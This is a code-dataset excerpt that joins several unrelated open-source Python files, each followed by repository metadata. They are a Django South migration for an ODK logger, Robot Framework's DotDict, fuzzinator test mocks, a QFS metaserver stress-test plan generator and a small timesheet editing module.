'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'odk_logger.attachment': {
'Meta': {'object_name': 'Attachment'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'instance': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'attachments'", 'to': "orm['odk_logger.Instance']"}),
'media_file': ('django.db.models.fields.files.FileField', [], {'max_length': '100'})
},
'odk_logger.instance': {
'Meta': {'object_name': 'Instance'},
'date': ('django.db.models.fields.DateField', [], {'null': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'start_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "u'submitted_via_web'", 'max_length': '20'}),
'survey_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['odk_logger.SurveyType']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'surveys'", 'null': 'True', 'to': "orm['auth.User']"}),
'uuid': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '32'}),
'xform': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'surveys'", 'null': 'True', 'to': "orm['odk_logger.XForm']"}),
'xml': ('django.db.models.fields.TextField', [], {})
},
'odk_logger.surveytype': {
'Meta': {'object_name': 'SurveyType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'odk_logger.xform': {
'Meta': {'ordering': "('id_string',)", 'unique_together': "(('user', 'id_string'),)", 'object_name': 'XForm'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'default': "u''", 'null': 'True'}),
'downloadable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'has_start_time': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'id_string': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}),
'is_crowd_form': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'json': ('django.db.models.fields.TextField', [], {'default': "u''"}),
'shared': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'shared_data': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'xforms'", 'null': 'True', 'to': "orm['auth.User']"}),
'uuid': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '32'}),
'xls': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True'}),
'xml': ('django.db.models.fields.TextField', [], {})
}
}
complete_apps = ['odk_logger']
| bsd-2-clause | -5,078,787,693,243,298,000 | 70.461538 | 182 | 0.549381 | false |
synsun/robotframework | src/robot/utils/dotdict.py | 3 | 1574 | # Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
from collections import OrderedDict
except ImportError: # New in Python 2.7
from .ordereddict import OrderedDict
class DotDict(OrderedDict):
def __getattr__(self, key):
try:
return self[key]
except KeyError:
raise AttributeError(key)
def __setattr__(self, key, value):
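        # OrderedDict keeps its internal bookkeeping in name-mangled
        # '_OrderedDict__*' attributes; leave those as real attributes and
        # store everything else as a dictionary item.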
if not key.startswith('_OrderedDict__'):
self[key] = value
else:
OrderedDict.__setattr__(self, key, value)
def __delattr__(self, key):
try:
self.pop(key)
except KeyError:
OrderedDict.__delattr__(self, key)
def __eq__(self, other):
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other
def __str__(self):
return '{%s}' % ', '.join('%r: %r' % (key, self[key]) for key in self)
# Must use original dict.__repr__ to allow customising PrettyPrinter.
__repr__ = dict.__repr__
| apache-2.0 | 4,890,827,775,549,104,000 | 29.862745 | 78 | 0.629606 | false |
renatahodovan/fuzzinator | tests/call/common_call.py | 2 | 1286 | # Copyright (c) 2016 Renata Hodovan, Akos Kiss.
#
# Licensed under the BSD 3-Clause License
# <LICENSE.rst or https://opensource.org/licenses/BSD-3-Clause>.
# This file may not be copied, modified, or distributed except
# according to those terms.
import os
blinesep = str.encode(os.linesep)
resources_dir = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'resources')
def mock_always_fail_call(**kwargs):
"""
Unconditionally return an issue dictionary composed of all the keyword
arguments of the function.
"""
return dict(kwargs)
def mock_never_fail_call(**kwargs):
"""
Unconditionally return ``None`` signaling no issue.
"""
return None
class MockAlwaysFailCall(object):
"""
Unconditionally return an issue dictionary composed of all the keyword
arguments of the constructor and the call.
"""
def __init__(self, **kwargs):
self.init_kwargs = kwargs
def __call__(self, **kwargs):
issue = dict(self.init_kwargs)
issue.update(kwargs)
return issue
class MockNeverFailCall(object):
"""
Unconditionally return ``None`` signaling no issue.
"""
def __init__(self, **kwargs):
pass
def __call__(self, **kwargs):
return None
| bsd-3-clause | -8,797,606,947,158,945,000 | 22.814815 | 102 | 0.656299 | false |
qnu/qfs | benchmarks/mstress/mstress_plan.py | 5 | 6319 | #!/usr/bin/env python
# $Id$
#
# Author: Thilee Subramaniam
#
# Copyright 2012 Quantcast Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy
# of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# This code is used to generate a plan file for metaserver vs namenode
# benchmarking.
#
import optparse
import sys
import subprocess
import time
import os
import math
import getpass
"""
This program is used to create the directory/file layout to be used
in metaserver/namenode stress test.
You basically specify the depth of the directory tree and the number
of elements (files or directories) per level, along with the list of
client-hosts you want to use and the number of clients per client-host
that you want to use.
This script will generate the plan file, and copy it to the /tmp on the
given list of client hosts.
Thereafter, you can execute the mstress.py with this plan file.
"""
class Globals:
PATH_PREFIX = 'Dir_'
PLAN_OUTPUT = './planfile.txt'
def ParseCommandline():
epi = ('Example: "%s -c h1,h2 -n 3 -l 4 -i 3 -s 100" would create 4 levels of 3 inodes ' % sys.argv[0] +
'(3+9+27+81=120) per client process. Since there are 3 ' +
'processes on 2 hosts, we create 120x6=720 inodes. We will attempt ' +
'to stat 100 random leaf paths using all client processes. We will do a readdir ' +
'all through the directory tree.')
parser = optparse.OptionParser(epilog=epi)
parser.add_option('-c', '--client-hosts',
action='store',
default='localhost',
type='string',
help='Comma-separated list of client host names.')
parser.add_option('-n', '--clients-per-host',
action='store',
default=1,
type='int',
help='Number of clients per client host.')
parser.add_option('-l', '--levels',
action='store',
default=1,
type='int',
help='File-tree depth on each client.')
parser.add_option('-i', '--inodes-per-level',
action='store',
default=100,
type='int',
help='Inodes per each level on each client.')
parser.add_option('-t', '--path-type',
action='store',
default='dir',
type='string',
help='Whether to create "dir" or "file" inodes.')
parser.add_option('-s', '--num-to-stat',
action='store',
default=100,
type='int',
help='Number of inodes to stat (<=total leaf inodes).')
parser.add_option('-o', '--output-file',
action='store',
default=None,
type='string',
help='Output plan file.')
opts, args = parser.parse_args()
if args:
sys.exit('Unexpected arguments: %s.' % str(args))
if opts.output_file is None:
opts.output_file = '/tmp/mstress_%s_%s.plan' % (getpass.getuser(), time.strftime("%F-%H-%M-%S", time.gmtime()))
return opts
def main():
opts = ParseCommandline()
hostlist = opts.client_hosts.split(',')
numClientProcesses = float(len(hostlist) * opts.clients_per_host)
if numClientProcesses == 0.0:
sys.exit('Invalid client processes')
  #get the per-client stat count: the smallest integer such that statPerClient * numClientProcesses >= opts.num_to_stat
statPerClient = int(math.ceil(float(opts.num_to_stat) / numClientProcesses))
#print opts
outfile = open(opts.output_file, 'w')
outfile.write('# *** DO NOT EDIT THIS FILE BY HAND *** \n# USE mstress_plan.py TO MODIFY INSTEAD\n#\n')
outfile.write('#List of hosts taking part in the plan\nhostslist=%s\n' % opts.client_hosts)
outfile.write('#Number of mstress cliends per client host\nclientsperhost=%d\n' % opts.clients_per_host)
outfile.write('#File or directory\ntype=%s\n' % opts.path_type)
outfile.write('#Number of levels in created tree\nlevels=%d\n' % opts.levels)
outfile.write('#Number of inodes per level\ninodes=%d\n' % opts.inodes_per_level)
outfile.write('#Number of random paths to stat, per client\nnstat=%d\n' % statPerClient)
""" old code
begin_tree_delta = 0
for level in range(0,opts.levels):
begin_tree_delta = begin_tree_delta + pow(opts.inodes_per_level, level + 1)
#print "delta = ", begin_tree_delta
outfile.write('#host\tclient\tlevel\tdistribution\n')
begin_tree_idx = 0
for host_no in range(0,len(hostlist)):
host = hostlist[host_no]
for client_no in range(0,opts.clients_per_host):
# tree for this level
begin_idx = begin_tree_idx
for level in range(0,opts.levels):
prefix = '%s\tproc_%02d\t%d\t' % (host, client_no, level)
# print '-- h=%d, c=%d level=%d, begin idx = %d' % (host_no, client_no, level, begin_idx)
suffix = ''
for ranges in range(0, pow(opts.inodes_per_level, level)):
if len(suffix) != 0:
suffix = suffix + ','
suffix = suffix + '%d-%d'%(begin_idx, begin_idx + opts.inodes_per_level - 1)
begin_idx = begin_idx + opts.inodes_per_level
outfile.write('%s\t%s\n' % (prefix, suffix))
begin_tree_idx = begin_tree_idx + begin_tree_delta
#print "next begin tree idx = ", begin_tree_idx
"""
outfile.close()
print '==> Created planfile: %s' % opts.output_file
print 'copying file %s to all client hosts' % opts.output_file
for client in hostlist:
p = subprocess.Popen(['/usr/bin/scp', os.path.abspath(opts.output_file), '%s:%s' % (client, opts.output_file)])
while 1:
ret = p.poll()
if ret == None:
time.sleep(0.5)
else:
        print 'transferred %s to %s' % (opts.output_file, client)
break
if __name__ == '__main__':
main()
| apache-2.0 | -6,966,773,101,635,962,000 | 36.390533 | 115 | 0.614021 | false |
arivarton/workhours | stamp/edit.py | 1 | 1477 | import sys
import re
__all__ = ['edit_workday',
'edit_customer',
'edit_project',
'edit_invoice']
def edit_workday(args):
workday = args.db.get('Workday', args.id)
if args.comment:
workday.comment = args.comment
if args.customer:
workday.customer = args.customer
if args.project:
workday.project = args.db.get_project(args.project)
return workday
def edit_customer(db, id, name=None, contact=None, org_nr=None, address=None,
zip_code=None, mail=None, phone=None):
customer = db.get('Customer', id)
if name:
customer.name = name
if contact:
customer.contact = contact
if org_nr:
customer.org_nr = org_nr
if address:
customer.address = address
if zip_code:
customer.zip_code = zip_code
if mail:
customer.mail = mail
if phone:
        customer.phone = phone
return customer
def edit_project(db, id, name=None, link=None):
project = db.get('Project', id)
if name:
project.name = name
if link:
project.link = link
return project
def edit_invoice(db, id, paid=False, sent=False):
invoice = db.get('Invoice', id)
if paid:
if invoice.paid:
invoice.paid = False
else:
invoice.paid = True
if sent:
if invoice.sent:
invoice.sent = False
else:
invoice.sent = True
return invoice
| gpl-3.0 | -1,168,086,392,038,541,600 | 24.465517 | 77 | 0.578876 | false |